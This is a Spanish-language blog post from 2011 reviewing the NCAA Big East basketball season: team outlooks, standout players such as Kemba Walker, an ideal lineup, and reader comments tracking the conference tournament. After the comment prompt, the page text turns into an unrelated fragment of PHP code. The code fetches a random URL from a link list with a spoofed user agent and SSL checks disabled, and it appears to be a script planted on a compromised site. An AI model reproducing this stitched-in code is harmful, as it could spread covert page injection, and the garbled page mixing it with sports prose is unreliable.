Análisis NCAA – Big East Conference (ACC)

28 de February de 2011 por kantonyo

Continuamos nuestro análisis de la temporada universitaria con la conferencia de mayor potencial del campeonato, ya que ocho de las dieciséis universidades que la componen se encuentran actualmente en el top 25. Eso sí, este año la Big East está huérfana de jugadores en los que fijarnos para el próximo draft con la excepción de Kemba Walker, que a pesar de su gran rendimiento, está viendo su prestigio afectado debido a la racha de derrotas que está sufriendo la Universidad de Connecticut en los últimos partidos.

En cuanto a la competición, los Panthers de Pittsburgh están a punto de proclamarse campeones de la liga regular. Con muy pocas bajas, en los últimos años han logrado conjuntar un equipo muy sólido. Su juego exterior está compuesto por el base de tercer año, Asthon Gibbs, máximo anotador con 17 puntos por partido y la pareja de escoltas Brad Wanamaker y Gilbert Brown. Por su parte, Dante Taylor y Gary McGhee son la referencia en el poste alto. Los Panthers destacan por su capacidad reboteadora, siendo el 7º equipo de todo el torneo. A pesar de que sólo han perdido tres partidos en toda la temporada, la falta de un jugador referencia capaz de llevar la batuta puede ser el gran hándicap para aspirar a grandes metas.

La Universidad de Notre Dame parece que no ha notado la gran ausencia de su estrella en las últimas temporadas, Luke Harangody. A pesar de un mes de enero muy irregular, los irlandeses han conseguido un balance de 8 victorias y 1 derrota en el último mes. Ben Hansbrough, hermano pequeño del jugador de los Pacers, ha explotado en las últimas semanas con grandes actuaciones ayudando incluso a derrotar a los Panthers. A diferencia de Tyler, Ben es un jugador de poca estatura y juega en el puesto de base. Destacan también los aleros Carleton Scott y Tim Abromaitis. Los Irish sufren bastante en el poste alto donde no tienen grandes recursos.

El otro equipo de la Big East capaz de vencer a los Panthers, han sido los Red Storm de la Univesidad de Saint John, convirtiéndose en la gran revelación de la conferencia. Contra todo pronóstico se han colado en el top 25 de la Associated Press, tambien gracias a la espectacular victoria por 15 puntos contra los Blue Devils de Duke. El base Dwight Hardy con 17 puntos de media es su jugador más destacado.

Los Hoyas de Georgetown han visto como en los últimos partidos se cortaba la racha de ocho victorias consecutivas con dos derrotas inesperadas ante UConn y Cincinnati. Tras la marcha de Greg Monroe a la NBA, los de Washington han apostado por la continuidad del bloque. El escolta Austin Freeman es el jugador más destacado de una plantilla con muchos recursos.

Como hemos dicho anteriormente, la gran decepción de la temporada en la Big East han sido los Huskies de Connecticut. El base Kemba Walker ha dejado atrás la pobre temporada pasada donde se cortó su progresión y se ha convertido en una de las atracciones del año en la NCAA. Parece que la joven plantilla que se ha formado a su alrededor con muchos jugadores de primer año no está cumpliendo las expectativas.

Otras universidades que a pesar de los malos resultados en los últimos encuentros siguen siendo aspirantes a títulos son Syracuse, Louisville y Villanova. En los Orange de Syracuse destaca el potente pívot Rick Jackson y el alero Krish Joseph. Louisville posee una plantilla muy profunda y versátil donde el joven alapívot de primer año Gorgui Dieng está dejando buenas sensaciones a pesar de los pocos minutos que disputa. En Villanova, el pívot beninés Mouphtaou Yarou está empezando a sonar en algunos mockdraft como segunda ronda gracias a sus cualidades físicas.

Tambien hay que destacar al escolta Marshon Brooks, máximo anotador de la conferencia con 25 puntos (52 puntos contra Notre Dame). A la pareja de aleros de Marquette, Jimmy Butler y Jae Crowder. Y al escolta anotador de Seton Hall, Jeremy Hazell que se ha perdido la mitad de temporada por una lesión.

Quinteto Ideal

C – Rick Jackson (Syracuse)
PF – Jimmy Butler (Marquette)
SG – Marshon Brooks (Providence)
SG – Ben Hansbrough (Notre Dame)
PG – Kemba Walker (UConn)

Otros jugadores a seguir

– Centers: Alex Oriakhi (UConn), Terrence Jennings (Louisville), Gary McGhee (Pittsburgh), Moutphtaou Yarou (Villanova)
– Forwards: Carleton Scott (Notre Dame), Tim Abromaitis (Notre Dame), John Flowers (West Virginia), Kris Joseph (Syracuse), Gorgui Dieng (Louisville), Rakeem Buckles (Louisville), Jae Crowder (Marquette), Dante Taylor (Pittsburgh), Julian Vaughn (Georgetown), Cleveland Melvin (DePaul)
– Guards: Austin Freeman (Georgetown), Brad Wanamaker (Pittsburgh), Gilbert Brown (Pittsburgh), Corey Fisher (Villanova), Jeremy Hazell (Seton Hall), Dwight Hardy (St John),

Comenta

15 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    De donde es un tio que es beninés???

      Citar

  2. Len Bias dice:
    #2

    Arriesgandome a que sea pregunta con trampa… de Benin

      Citar

  3. Viva_Dirk dice:
    #3

    Nada de pregunta trampa, y ni idea de que existiera un pais llamado Benin.

      Citar

  4. kantonyo dice:
    #4

    Sí, la verdad es que lo de Benin es lo más destacado de esta conferencia, no hay figuras claves en las que fijarse. Y sobre todo despues como los UConn se estan hundiendo en la miseria y corren un gran peligro para poder clasificarse para el MarchMadness. Nos podemos quedar sin Kemba Walker para ese torneo….

    Aún así es la conferencia más fuerte a priori.

      Citar

  5. Viva_Dirk dice:
    #5

    A mi Kemba Walker me parece un jugadorazo, sería una pena no verlo en la locura de marzo.

      Citar

  6. kantonyo dice:
    #6

    Ayer terminó la Regular Season de la Conferencia Big East con la victoria en solitario de los Panthers de Pittsburgh gracias a su victoria contra Villanova con Asthon Gibbs liderando a los Panthers.

    Por su parte Notre Dame consiguió quedar en segundo lugar consiguiendo la victoria en el partido más importante de la última jornada contra UConn de Kemba Walker. Ben Hansbrough volvió a ser el alma de los Fighting Irish con 21 puntos (8 de 9) y 5 asistencias. Walker fue el mejor de los Huskies con 34 puntos.

    La clasificación final queda asi:

    1. Pittsburgh 15-3
    2. Notre Dame 14-4
    3. Syracuse 12-6
    4. Louisville 12-6
    5. Saint John’s 12-6
    6. Cincinnati 11-7
    7. West Virginia 11-7
    8. Georgetown 10-8
    9. Connecticut 9-9
    10. Villanova 9-9
    11. Marquette 9-9
    12. Seton Hall 7-11
    13. Rutgers 5-13
    14. Providence 4-14
    15. South Florida 3-15
    16. DePaul 1-17

      Citar

  7. kantonyo dice:
    #7

    Las eliminatorias para el torneo de la Big East quedan asi:

    #1 Pittsburgh Vs (UConn/DePaul Vs Georgetown)
    # 4 Syracuse Vs (SetonHall/Rutgers Vs Saint Johns)

    #2 NotreDame Vs (Villanova/SouthFlorida Vs Cincinnati)
    #3 Louisville Vs (Marquette/Providence Vs West Virginia)

      Citar

  8. Txusma dice:
    #8

    Todos estos torneos en realidad no sirven para nada en la March Madness, verdad? Según tengo entendido el orden lo otorga un jurado. Bastante curioso el tema.

      Citar

  9. kantonyo dice:
    #9

    El campeon de cada torneo de conferencia se clasifica directamente al March Madness, aunque se una conferencia menor o aunque ese equipo haya tenido un balance malisimo antes del torneo. Ser campeon de la regular season no te asegura nada en cambio, aunq en una conferencia con prestigio practicamente te mete dentro.

      Citar

  10. kantonyo dice:
    #10

    Continuo actualizando lo que está ocurriendo en la Champ Week. En el Madison Square Garden se está disputando el torneo de la Big East:

    Pittsburgh ya tiene rival para los cuartos. Los Huskies de Connecticut han derrotado a Georgetown y DePaul con un Kemba Walker espectacular, 26 puntos contra DePaul y 28 contra los dificiles Georgetown. Tambien ha tenido buenas actuaciones el escolta freshman Jeremy Lamb, jugador con gran futuro.

    Syracuse se verá las caras con Saint John’s. Los Red Storm se deshicieron de Rutger en un partido muy apretado donde el base Dwight Hardy fue el mejor con 17 puntos. Saint Johns estará casi seguro en el March Madness.

    Cincinnati será el rival de Notre Dame. Los Bearcats de Cincinnati pasaron por encima South Florida con un partidazo de Yancy Gates con 25 puntos. Cincinnati está a un nivel grandisimo. El partido contra Notre Dame se antoja interesante.

    Y por último, Marquette dió la sorpresa derrotando a West Virginia (finalistas a cuatro en 2010, y q va a tener muy complicado clasificarse para el March Madness). Louisville los espera en cuartos.

      Citar

  11. kantonyo dice:
    #11

    Kemba Walker ha llevado a los Huskies de Connecticut al campeonato de la Conferencia Big East.

    Después de unos meses desastrosos donde peligró la clasificación al March Madness con un balance (4-7), los Huskies han conseguido dar la campanada consiguiendo el titulo despues de deshacerse en cuartos de los grandes favoritos (Pittsburgh) con 24 puntos de Walker y 17 de Lamb, en semifinales de Syracuse en la prorroga con 33 puntos de Wlaker y 15 de Oriakhi, y en la final contra Louisville con 19 de Walker y 13 de Lamb.

    Kemba Walker con estas actuaciones vuelve a entrar en los puestos altos del draft. Os dejo el buzzer beater que hizo ante Pittsburgh:

    http://www.youtube.com/watch?v=fKbLHkDvhk8

    Por el camino se quedó Notre Dame en la derrota contra Louisville en un mal partido de Ben Hansbrough.

      Citar

  12. Txusma dice:
    #12

    Kemba Walker es más que un Ben Gordon o un Jamal Crawford?

      Citar

  13. Txusma dice:
    #13

    Y ahora que veo el vídeo. Muy mal defendido por Pitssburg, no? Teniendo claro que se la iba a jugar Walker como lo dejan defendido por el pívot del equipo tanto y tanto tiempo?
    Se le ve muy rápido y ágil…

      Citar

  14. TheDeerHunter dice:
    #14

    Jojojo… pedazo de defensa que le hace el pívot ese, ¿no??

      Citar

  15. Denise dice:
    #15

    Será un canastón, pero hace pasos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>